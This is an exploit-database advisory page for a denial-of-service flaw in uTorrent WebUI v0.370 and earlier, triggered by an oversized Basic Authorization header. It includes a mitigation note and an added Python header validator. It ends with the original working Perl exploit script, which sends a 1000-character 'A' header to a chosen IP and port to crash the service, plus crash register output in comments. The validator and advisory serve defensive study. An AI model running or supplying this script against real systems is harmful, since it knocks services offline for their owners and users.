Vendor: uTorrent WebUI
By: zombiefx
CVSS: 7.5 (HIGH)
Type: Denial of Service (DoS)
CWE: 20
Product Name: uTorrent WebUI
Affected Version From: uTorrent WebUI <= v0.370
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
Year: 2010

uTorrent WebUI <= v0.370 Authorization header DoS Exploit

This exploit triggers a Denial of Service (DoS) vulnerability in uTorrent WebUI <= v0.370. It sends a crafted HTTP request whose Authorization header contains a large number of 'A' characters, which causes the application to crash.

Mitigation:

Upgrade to the latest version of uTorrent WebUI.
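
A server-side input check for the oversized header described above, as an added example that is not part of the original advisory or of the uTorrent code base: it validates a Basic Authorization header before any credential handling. The function name, the 256-character cap, the Basic-only policy and the sample requests are assumptions constructed for illustration.

```python
import base64
import binascii

# Assumed policy limit (not from the advisory): longest Basic credential accepted.
MAX_CREDENTIAL_CHARS = 256

def check_basic_auth(raw_request: bytes) -> str:
    """Return "absent", "ok", or a "reject: ..." reason for one raw HTTP request."""
    head = raw_request.split(b"\r\n\r\n", 1)[0]
    values = []
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"authorization":
            values.append(value.strip())
    if not values:
        return "absent"
    if len(values) > 1:
        return "reject: multiple Authorization headers"
    scheme, _, credential = values[0].partition(b" ")
    if scheme.lower() != b"basic":  # assumed: this endpoint only speaks Basic
        return "reject: unexpected scheme"
    credential = credential.strip()
    # Length is checked first, before any decoding or copying of the value.
    if len(credential) > MAX_CREDENTIAL_CHARS:
        return "reject: credential too long (%d chars)" % len(credential)
    try:
        decoded = base64.b64decode(credential, validate=True)
    except (binascii.Error, ValueError):
        return "reject: not valid base64"
    # RFC 7617 credentials decode to "user-id:password".
    if b":" not in decoded:
        return "reject: no user:password separator"
    return "ok"

# Constructed sample requests (not captured traffic).
SAMPLE_OVERSIZED = b"GET / HTTP/1.1\r\nAuthorization: Basic " + b"A" * 1000 + b"\r\n\r\n"
SAMPLE_VALID = (b"GET / HTTP/1.1\r\nAuthorization: Basic "
                + base64.b64encode(b"admin:secret") + b"\r\n\r\n")
SAMPLE_SHORT_AS = b"GET / HTTP/1.1\r\nAuthorization: Basic AAAA\r\n\r\n"

if __name__ == "__main__":
    for sample in (SAMPLE_OVERSIZED, SAMPLE_VALID, SAMPLE_SHORT_AS):
        print(check_basic_auth(sample))
```

A run of 'A' characters is itself valid base64, so the length cap and the separator check are what reject it, not the base64 decode.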

Exploit-DB raw data:

#!/usr/bin/perl
# Exploit Title: uTorrent WebUI <= v0.370 Authorization header DoS Exploit
# Date: 2010-04-01
# Author: zombiefx darkernet[at]gmail.com
# Version: µTorrent 2.0 (build 18488) / WebUI <=v0.370
# Tested on: Windows XP SP3
#Code:
# lame usage: ./UTweb.pl <IP> <PORT>
# EAX 00000000 ECX 00000000 EDX 00000001 EBX 003D8360 ASCII "admin" ESP 0141FE94
# EBP 0141FF08 ESI 00000000 EDI 01511958 EIP 0041BC62 uTorrent.0041BC62
# Good luck! corelanc0d3r

use warnings;
use strict;
use IO::Socket;
my $nonbase64 = "\x41" x 1000; # That was pointless
my $sock = IO::Socket::INET->new(PeerAddr =>$ARGV[0],PeerPort =>$ARGV[1],Proto => 'tcp');
print $sock "GET / HTTP/1.1\r\n".
"Authorization: Basic $nonbase64\r\n\r\n";